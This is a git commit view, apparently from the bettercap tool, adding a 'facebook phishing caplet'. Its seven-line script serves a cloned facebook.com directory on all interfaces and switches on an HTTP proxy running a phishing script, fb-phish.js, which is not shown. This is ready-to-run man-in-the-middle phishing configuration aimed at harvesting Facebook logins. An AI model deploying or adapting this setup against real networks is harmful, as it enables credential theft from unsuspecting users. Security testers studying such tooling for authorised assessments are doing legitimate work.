new: facebook phishing caplet

This commit is contained in:
evilsocket 2018-01-13 03:42:43 +01:00
commit 2fc4bf6125
6 changed files with 365 additions and 1 deletions

7
caplets/fb-phish.cap Normal file
View file

@ -0,0 +1,7 @@
set http.server.address 0.0.0.0
set http.server.path caplets/www/www.facebook.com/
set http.proxy.script caplets/fb-phish.js
http.proxy on
http.server on